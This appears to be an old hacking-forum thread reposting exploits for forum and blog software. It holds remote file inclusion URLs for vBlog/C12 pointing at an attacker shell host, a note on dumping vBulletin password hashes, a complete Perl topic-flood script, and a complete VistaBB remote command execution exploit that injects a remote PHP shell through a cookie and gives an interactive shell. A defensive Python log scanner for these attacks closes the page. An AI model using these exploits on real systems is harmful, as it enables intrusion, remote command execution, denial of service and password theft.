black_hat_cr(HCE)
vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
Code:
* Portal Name : Vortex Blog AKA vBlog
* Class = Remote File Inclusion ;
* Download = http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

- Vulnerable Code
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?

Black_hat_cr(HCE)
vBulletin 3.5.4 (install_path) Exploit by: CarcaBot
- application : vbulletin
- URL : http://www.vbulletin.com
- Exploit: http://www.victimsite.com/forumpath=http://CarcaBot.Ro
- More Details: Dump the SQL DB named user, then you have access to all users' MD5 passwords

vns3curity(HCE)
View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb
Copied material
Code:
#!/usr/bin/perl
# View Topic Flood for phpBB, MercuryBoard, vBulletin and IPB (SpiderZ).
# Opens a fresh TCP connection per iteration and sends an empty POST to the
# chosen topic URL; the only "payload" is request volume.
use IO::Socket;

print q{
__________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
      /  \ \ \ ,, / / '
        `\()/`
       ' _'( )'_
    / /` /`""`\ `\ \      * SpiderZ ForumZ Security *
    | |   ><   | |
     \ \  /  / /
       '.__.'
=> View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb
=> Site: www.spiderz.altervista.org
=> Site2: www.spiderz.netsons.org
=> Author: SpiderZ
=> Bug found by Gaggo, exploit written by SpiderZ
__________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
};

print q{
=> Exploit created by: SpiderZ
=> Enter the site's hostname
=> without "www" or "http://"
=> };
my $host = <STDIN>; chop($host);

print q{
=> Enter the forum directory
=> directory: ( /Forum/ )
=> };
my $pth = <STDIN>; chop($pth);

print q{
=> phpBB ( viewtopic.php?t= )
=> MercuryBoard ( index.php?a=topic&t= )
=> Vbulletin ( showthread.php?t= )
=> Ipb ( index.php?showtopic= )
=> };
my $t = <STDIN>; chop($t);

print q{
=> Topic number
=> E.g.: viewtopic.php?t=1 ( 1, 2, 3, etc. )
=> };
my $topic = <STDIN>; chop($topic);

print q{
=> How many times do you want to flood? ( 1 / 10000 )
=> };
my $while = <STDIN>; chop($while);

# The script never fills in a body, so every POST goes out with Content-Length: 0.
my $postit = "";
my $lrg    = length $postit;
my $x      = 0;

while ($x < $while) {
    my $sock = new IO::Socket::INET(
        PeerAddr => "$host",
        PeerPort => "80",
        Proto    => "tcp",
    );
    die "\nThe Socket: $!\n" unless $sock;
    print $sock "POST $pth" . "$t$topic HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Referer: $host\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Content-Length: $lrg\r\n\r\n";
    print $sock "$postit\n";
    close($sock);
    syswrite STDOUT, ".";
    $x++;
}

print q{
=> Attack complete!
=> www.spiderz.tk
};

black_hat_cr(HCE)
VistaBB <= 2.x Multiple File Inclusion
Exploit in Perl:
Quote:
#!/usr/bin/perl
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=48
#
# VistaBB <= 2.x Remote Command Execution Exploit
#
# This exploit comes with its own php shell setting.
# If you want to change it, your file must contain this data >
#
# <?php
# echo "_START_\n";
# ini_set("max_execution_time",0);
# error_reporting(0);
# passthru($_REQUEST[command]);
# echo "\n_END_";
# ?>
#
# Copyright 2006 (C) nukedx
#
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends

use IO::Socket;

# Default configuration: URL of the PHP shell that the vulnerable include_once()
# will fetch. The "?" appended below turns the rest of the include path into a
# query string, so the remote file is loaded instead of includes/...
$shell = "http://hometown.aol.com/yarivgiladi/sh.php";

# Checking user settings
if (@ARGV != 2) { usage(); } else { exploit(); }

sub header {
    print "\n- NukedX Security Advisory Nr.2006-44\r\n";
    print "- VistaBB <= 2.x Remote Command Execution Exploit\r\n";
}

sub usage {
    header();
    print "- Usage: $0 <host> <path>\r\n";
    print "- <host> -> Victim's host ex: www.victim.com\r\n";
    print "- <path> -> Path to VistaBB ex: /vistabb/ or just /\r\n";
    exit();
}

sub exploit {
    # User variables
    $host = $ARGV[0];
    $host =~ s{^http://}{};
    $target = $ARGV[1] . "includes/functions_mod_user.php";

    print "Trying to connect: $host\r\n";
    # First command doubles as the vulnerability check: if the server answers
    # with the shell's _START_/_END_ frame, the remote include worked.
    $whoami = trim(sendcmd("whoami"));
    print "Connected to victim: $host\r\n";
    print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";

    while (1) {
        print "[" . $whoami . "@" . $host . " /]\$ ";
        my $cmds = <STDIN>;
        last unless defined $cmds;
        chomp($cmds);
        if ($cmds =~ /^exit/) {
            print "Closing exploit \r\n"; sleep(3); exit();
        }
        print sendcmd($cmds);
    }
}

# Send one command to the shell through the phpbb_root_path cookie and return
# everything the server prints between the _START_ and _END_ markers.
sub sendcmd {
    my ($cmd)  = @_;
    my $c2s    = "command=" . $cmd;
    my $c2slen = length($c2s);
    my ($good, $out) = (0, "");

    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => 80)
        || die "Connection failed \r\n";
    print $sock "POST $target HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Accept: */*\r\n";
    print $sock "Referer: $host\r\n";
    print $sock "Accept-Language: tr\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Accept-Encoding: gzip, deflate\r\n";
    print $sock "User-Agent: NukeZilla\r\n";
    # The injection: functions_mod_user.php does include_once($phpbb_root_path . ...)
    # and, with register_globals on, a cookie named phpbb_root_path sets that variable.
    print $sock "Cookie: phpbb_root_path=" . $shell . "?\r\n";
    print $sock "Content-length: $c2slen\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n\r\n";
    print $sock $c2s;
    print $sock "\r\n\r\n";

    while (my $result = <$sock>) {
        last if $result =~ /^_END_/;
        if ($good == 1) {
            $out .= $result;
        } elsif ($result =~ /Warning: include_once/) {
            # PHP reported the include failure instead of running the shell.
            print "Sorry victim is not vulnerable or patched! \r\nClosing exploit \r\n";
            sleep(3); exit();
        }
        $good = 1 if $result =~ /^_START_/;
    }
    close($sock);
    return $out;
}

sub trim {
    my $string = shift;
    $string =~ s/^\s+//;
    $string =~ s/\s+$//;
    return $string;
}
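The three attack shapes in this thread leave distinct traces in web-server logs, so here is a detection pass over them. This is an added example written for this page, not code from any of the posts or from the projects they target. It assumes an Apache LogFormat that appends the Cookie header as a final quoted field (an assumption, since the stock "combined" format stops after the User-Agent and never records cookies, which is exactly where the VistaBB exploit hides its payload); the log lines, addresses (documentation ranges) and thresholds are all constructed.

```python
"""Scan access-log lines for (a) remote-URL values in query parameters or
cookies, the request shape of the vBlog cfgProgDir and VistaBB phpbb_root_path
remote file inclusions, and (b) bursts of POSTs from one source to one topic
URL, the shape of the SpiderZ view-topic flood.  Constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed Apache LogFormat (an assumption for this example, not a project setting):
#   "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Cookie}i\""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)
# A value starting with a scheme that PHP's include() will fetch over the network.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['ts'] = datetime.strptime(entry['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return entry


def rfi_hits(entry):
    """List (where, name, value) for every query parameter or cookie whose value
    is a remote URL, e.g. cfgProgDir=http://evilsite.com/shell? or
    Cookie: phpbb_root_path=http://.../sh.php?"""
    hits = []
    for name, value in parse_qsl(urlsplit(entry['target']).query, keep_blank_values=True):
        # parse_qsl already %-decodes once; unquote again so a double-encoded
        # http%253A%252F%252F does not slip past.
        if REMOTE_URL_RE.match(unquote(value)):
            hits.append(('query', name, value))
    for part in entry['cookie'].split(';'):
        name, _, value = part.strip().partition('=')
        if name and REMOTE_URL_RE.match(unquote(value)):
            hits.append(('cookie', name, value))
    return hits


def flood_sources(entries, window_seconds=60, threshold=50):
    """Map (ip, request target) -> peak number of POSTs inside any
    window_seconds-long window, for pairs that reach threshold."""
    buckets = defaultdict(list)
    for e in entries:
        if e['method'] == 'POST':
            buckets[(e['ip'], e['target'])].append(e['ts'])
    flagged = {}
    for key, times in buckets.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[key] = max(flagged.get(key, 0), count)
    return flagged


def scan(lines, **flood_opts):
    """Run both detectors over raw log lines."""
    entries = [e for e in map(parse_line, lines) if e]
    rfi = [(e['ip'],) + hit for e in entries for hit in rfi_hits(e)]
    return {'rfi': rfi, 'flood': flood_sources(entries, **flood_opts)}


# Constructed sample log lines.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2006:14:02:11 +0000] "GET /blog/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell? HTTP/1.1" 200 512 "-" "Mozilla/4.0" "-"',
    '203.0.113.7 - - [10/Mar/2006:14:02:12 +0000] "GET /blog/admin/auth/checklogin.php?cfgProgDir=http%3A%2F%2Fevilsite.com%2Fshell%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0" "-"',
    # The VistaBB exploit: nothing odd in the request line, only in the cookie.
    '198.51.100.9 - - [10/Mar/2006:14:03:01 +0000] "POST /vistabb/includes/functions_mod_user.php HTTP/1.1" 200 88 "198.51.100.9" "NukeZilla" "phpbb_root_path=http://hometown.aol.com/yarivgiladi/sh.php?"',
    # Local traversal is a different finding and is deliberately not matched here.
    '192.0.2.5 - - [10/Mar/2006:14:04:00 +0000] "GET /blog/admin/auth/secure.php?cfgProgDir=../../ HTTP/1.1" 200 512 "-" "Mozilla/4.0" "-"',
    '192.0.2.5 - - [10/Mar/2006:14:04:30 +0000] "GET /forum/viewtopic.php?t=1 HTTP/1.1" 200 4096 "-" "Mozilla/4.0" "-"',
]
# Sixty empty POSTs in one minute from one address to one topic, the way the
# SpiderZ script sends them: no User-Agent, Referer set to the bare hostname.
FLOOD_LOG = [
    '203.0.113.9 - - [10/Mar/2006:14:05:%02d +0000] "POST /forum/viewtopic.php?t=1 HTTP/1.1" 200 0 "www.example.org" "-" "-"' % s
    for s in range(60)
]

if __name__ == '__main__':
    report = scan(SAMPLE_LOG + FLOOD_LOG)
    for ip, where, name, value in report['rfi']:
        print(f'RFI attempt from {ip}: {where} {name}={value}')
    for (ip, target), peak in report['flood'].items():
        print(f'POST flood from {ip} to {target}: {peak} requests in 60s')
```

Two caveats when running this against real logs. The remote-URL rule matches any parameter carrying a URL, so applications that legitimately pass redirect or callback URLs will produce noise; narrow it to the parameter names the affected software uses (cfgProgDir, phpbb_root_path) or correlate with the stronger signal, an outbound HTTP fetch from the web server to a host it never normally contacts. The flood threshold of 50 POSTs per minute to one topic is a placeholder; set it from the site's own baseline, and note the empty body and missing User-Agent in the flood lines, which are cheap fingerprints of this particular script.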